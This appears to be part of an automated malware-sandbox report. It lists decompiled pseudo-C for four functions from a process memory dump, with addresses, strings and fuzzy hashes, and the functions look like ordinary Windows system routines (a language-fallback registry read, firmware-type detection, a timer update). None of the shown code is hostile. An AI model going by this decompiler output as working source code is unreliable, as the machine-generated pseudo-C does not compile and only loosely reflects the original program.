Function 048DE620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E048DE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E048DF358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E049195D0();
						}
						if(_t78 != 0) {
							L048F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0491FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0491BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E04919600();
					if(_t97 < 0) {
						goto L6;
					}
					E0491BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L048DF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0491BB40(_t83, _t102 + 0x24, _t78);
								if(L048E43C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0491BB40(_t84, _t102 + 0x24, _t94);
									if(L048E43C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x048de620
0x048de628
0x048de62f
0x048de631
0x048de635
0x048de637
0x048de63e
0x04935503
0x04935503
0x048de64c
0x048de64c
0x048de651
0x00000000
0x00000000
0x048de661
0x048de665
0x0493542a
0x048de715
0x048de71a
0x048de71c
0x048de720
0x048de720
0x048de727
0x048de736
0x048de736
0x048de743
0x048de743
0x048de673
0x048de678
0x048de67d
0x048de682
0x048de685
0x048de692
0x048de69b
0x048de6a3
0x048de6ad
0x048de6b1
0x048de6b2
0x048de6bb
0x048de6bf
0x048de6c0
0x048de6c8
0x048de6cc
0x048de6d5
0x048de6d9
0x00000000
0x00000000
0x048de6e5
0x048de6ea
0x048de6f9
0x048de70b
0x048de70f
0x04935439
0x0493545e
0x0493545e
0x00000000
0x0493545e
0x0493543b
0x0493543e
0x04935440
0x04935445
0x04935472
0x04935475
0x0493548d
0x04935493
0x049354a9
0x00000000
0x00000000
0x049354ab
0x049354b4
0x049354bc
0x049354c8
0x049354de
0x049354fb
0x049354e0
0x049354e6
0x049354eb
0x049354eb
0x049354de
0x00000000
0x049354bc
0x04935477
0x0493547a
0x04935480
0x04935483
0x04935486
0x0493548b
0x00000000
0x00000000
0x00000000
0x0493548b
0x00000000
0x00000000
0x00000000
0x00000000
0x04935447
0x04935447
0x04935447
0x04935447
0x0493544e
0x00000000
0x00000000
0x04935450
0x04935452
0x04935455
0x0493545a
0x00000000
0x00000000
0x00000000
0x0493545c
0x0493546a
0x0493546d
0x0493546f
0x00000000
0x0493546f
0x048de70f

Strings

\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 048DE68C
@, xrefs: 048DE6C0
InstallLanguageFallback, xrefs: 048DE6DB

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 24914d4678b43e92a9e675928e185365e3eb2760144596056286c522c146ae84
Instruction ID: 3e9fb218684e779ab06a60d8134026904cd9ec4dfde685a9fb8526e81f2234a8
Opcode Fuzzy Hash: 24914d4678b43e92a9e675928e185365e3eb2760144596056286c522c146ae84
Instruction Fuzzy Hash: B6519EB2505315ABD714DF24C444A7BB3E8AF89729F060A3EF989D7250F734EA04C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0499E539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E0499E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E0499BBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E0499BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E0499AFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E04919730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E0499A80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E0499A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E04919730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E0499A80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E0499A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E048F2280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E048EB090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E048EFFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E048F7D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E0498FEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x0499e547
0x0499e549
0x0499e54f
0x0499e553
0x0499e557
0x0499e55a
0x0499e55c
0x0499e55f
0x0499e561
0x0499e567
0x0499e56b
0x0499e7e2
0x00000000
0x0499e571
0x0499e575
0x0499e577
0x0499e57b
0x0499e57c
0x0499e57d
0x0499e57e
0x0499e57f
0x0499e588
0x0499e58f
0x0499e591
0x0499e592
0x0499e592
0x0499e596
0x0499e59e
0x0499e5a0
0x0499e5a6
0x0499e61d
0x0499e61d
0x0499e621
0x0499e623
0x0499e630
0x0499e630
0x0499e7e6
0x0499e7eb
0x0499e7ed
0x0499e7f4
0x0499e7fa
0x0499e7ff
0x0499e7ff
0x0499e80a
0x0499e812
0x0499e812
0x0499e5ab
0x0499e5b4
0x0499e5b9
0x0499e5be
0x0499e5c0
0x0499e5c2
0x0499e5c8
0x0499e5c9
0x0499e5cb
0x0499e5cc
0x0499e5d5
0x0499e5e4
0x0499e5f1
0x0499e5f8
0x0499e5f8
0x0499e5d5
0x0499e602
0x0499e616
0x0499e63d
0x0499e644
0x0499e64d
0x0499e652
0x0499e657
0x0499e659
0x0499e65b
0x0499e661
0x0499e662
0x0499e664
0x0499e665
0x0499e66e
0x0499e67d
0x0499e68a
0x0499e691
0x0499e691
0x0499e66e
0x0499e6b0
0x00000000
0x0499e6b6
0x0499e6bd
0x0499e6c7
0x0499e6d7
0x0499e6d9
0x0499e6db
0x0499e6de
0x0499e6e3
0x0499e6f3
0x0499e6fc
0x0499e700
0x0499e700
0x0499e704
0x0499e70a
0x0499e70a
0x0499e713
0x0499e716
0x0499e719
0x0499e720
0x0499e761
0x0499e76b
0x0499e774
0x0499e77a
0x0499e77a
0x0499e78a
0x0499e791
0x0499e799
0x0499e79b
0x0499e79f
0x0499e7aa
0x0499e7c0
0x0499e7ac
0x0499e7b2
0x0499e7b9
0x0499e7b9
0x0499e7c7
0x0499e806
0x00000000
0x0499e7c9
0x0499e7d1
0x0499e7d8
0x00000000
0x0499e7d8
0x00000000
0x00000000
0x0499e722
0x0499e72e
0x0499e748
0x0499e74c
0x0499e754
0x0499e756
0x0499e75c
0x0499e75c
0x00000000
0x0499e75c
0x0499e758
0x0499e758
0x00000000
0x0499e758
0x0499e750
0x00000000
0x00000000
0x0499e752
0x00000000
0x0499e752
0x0499e730
0x0499e735
0x0499e73d
0x0499e73f
0x00000000
0x00000000
0x0499e741
0x0499e741
0x00000000
0x0499e741
0x0499e739
0x00000000
0x00000000
0x0499e73b
0x00000000
0x0499e73b
0x0499e722
0x0499e720
0x0499e6b0
0x0499e618
0x00000000
0x0499e618

Strings

`, xrefs: 0499E670
`, xrefs: 0499E5D7

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction ID: 7866bd229122c1ddbd06cd40df5d1d5e11e786a03a9bce31f81c39f7371f450c
Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
Instruction Fuzzy Hash: DC914971204341ABEF24CE69C841B6AB7EAAFC4714F14893DF999CA2D0E775F904CB52

Uniqueness

Uniqueness Score: -1.00%

Function 049551BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E049551BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x49b05f0);
				E0492D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E048EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E049553CA(0);
						return E0492D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0491F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E048F3690(1, _t117, 0x48b1810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0491AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L048F4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0491AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E0495500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E04919860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x049551be
0x049551c3
0x049551c8
0x049551cd
0x049551d0
0x049551d3
0x049551d8
0x049551db
0x049551de
0x049551e0
0x049551e3
0x049551e6
0x049551e8
0x04955342
0x04955351
0x04955356
0x0495535a
0x04955360
0x04955363
0x04955366
0x04955369
0x04955369
0x0495536b
0x0495536b
0x04955370
0x049553a3
0x049553a4
0x049553a6
0x049553ab
0x049553ab
0x049553ae
0x049553ae
0x049553b5
0x049553bf
0x049553bf
0x04955375
0x04955396
0x049553a0
0x049553a0
0x00000000
0x04955396
0x04955377
0x04955379
0x0495537f
0x0495538c
0x04955390
0x00000000
0x04955390
0x049551ee
0x049551f1
0x04955301
0x04955310
0x04955315
0x04955318
0x0495531b
0x04955320
0x0495532e
0x04955331
0x00000000
0x04955331
0x04955328
0x04955329
0x00000000
0x04955329
0x049551fa
0x04955235
0x04955236
0x04955239
0x0495523f
0x04955240
0x04955241
0x04955242
0x04955246
0x04955247
0x0495524e
0x04955251
0x04955267
0x04955269
0x0495526e
0x0495527d
0x0495527e
0x04955281
0x04955282
0x04955287
0x04955288
0x0495528a
0x0495528f
0x04955294
0x00000000
0x00000000
0x0495529a
0x0495529c
0x0495529e
0x0495529e
0x049552a4
0x049552b0
0x00000000
0x00000000
0x049552ba
0x049552bc
0x049552bc
0x049552d4
0x049552d9
0x049552dc
0x049552e1
0x00000000
0x00000000
0x049552e7
0x049552f4
0x00000000
0x049552f4
0x04955270
0x00000000
0x04955270
0x049551fc
0x049551fd
0x04955202
0x04955203
0x04955205
0x0495520a
0x0495520f
0x00000000
0x00000000
0x0495521b
0x04955226
0x0495522b
0x0495521d
0x0495521d
0x04955222
0x04955222
0x0495522d
0x00000000

Strings

UEFI, xrefs: 0495521D
Legacy, xrefs: 04955226

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: f6ee5a628e71a31de5f430621918a66585914d9a7386bf6f5d20c2dd2351e599
Instruction ID: 872b1b529ce321542ffd0d9f02cd3d2ec09f1e3ad0f6427047c4b9d22fcc93c8
Opcode Fuzzy Hash: f6ee5a628e71a31de5f430621918a66585914d9a7386bf6f5d20c2dd2351e599
Instruction Fuzzy Hash: A5519F71E00609EFDB24DFA8C840AADB7F9FF48714F65443DE949EB266D671A900CB50

Uniqueness

Uniqueness Score: -1.00%

Function 048FB944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E048FB944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x49cd360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E048F7D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E049A8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E04919E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0491B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0491CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E048F7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E049A8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0491AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x49c8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x49c862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x49c8628; // 0x0
							_t116 =  *0x49c862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x048fb94c
0x048fb956
0x048fb95c
0x048fb95e
0x048fb964
0x048fb969
0x048fb96d
0x048fb96d
0x048fb970
0x048fb974
0x048fb97a
0x048fbadf
0x048fbadf
0x048fbae2
0x048fbae4
0x048fbae6
0x048fbaf0
0x04942cb8
0x048fbaf6
0x048fbaf6
0x048fbaf6
0x048fbafd
0x048fbb1f
0x048fbb1f
0x048fbaff
0x048fbb00
0x048fbb00
0x048fbb03
0x048fbb03
0x048fbacb
0x048fbacf
0x048fbad0
0x048fbad1
0x048fbadc
0x048fbadc
0x048fb980
0x048fb980
0x048fb988
0x048fb98b
0x048fb98d
0x048fb990
0x048fb993
0x048fb999
0x048fb99b
0x048fb9a1
0x048fb9a5
0x048fb9aa
0x048fb9b0
0x048fb9bb
0x048fb9c0
0x048fb9c3
0x048fb9ca
0x048fb9cc
0x048fb9cf
0x048fb9d3
0x048fb9d7
0x048fba94
0x048fba94
0x048fba98
0x048fbaa3
0x04942ccb
0x048fbaa9
0x048fbaa9
0x048fbaa9
0x048fbab1
0x04942cd5
0x04942cdd
0x04942cdd
0x048fbabb
0x048fbabc
0x048fbac2
0x048fbac3
0x048fbac3
0x048fbac6
0x00000000
0x048fb9dd
0x048fb9dd
0x048fb9e7
0x048fb9e7
0x048fb9ec
0x048fb9ec
0x048fb9f1
0x048fb9f5
0x048fb9fa
0x048fba00
0x048fba0c
0x048fba10
0x048fba10
0x048fba12
0x048fba18
0x00000000
0x00000000
0x048fbb26
0x048fbb26
0x048fba1e
0x048fba1e
0x048fba23
0x048fba25
0x048fba2c
0x048fba30
0x048fba35
0x048fba35
0x048fba41
0x048fba46
0x048fba4c
0x048fba50
0x048fba54
0x048fba6a
0x048fba6e
0x048fba70
0x048fba74
0x048fba78
0x048fba7a
0x048fba7c
0x048fba8e
0x048fba90
0x048fba92
0x048fbb14
0x048fbb14
0x048fbb16
0x048fbb16
0x00000000
0x048fba7c
0x048fbb0a
0x048fbb0d
0x00000000
0x00000000
0x00000000
0x048fbb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 048FB9A5

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
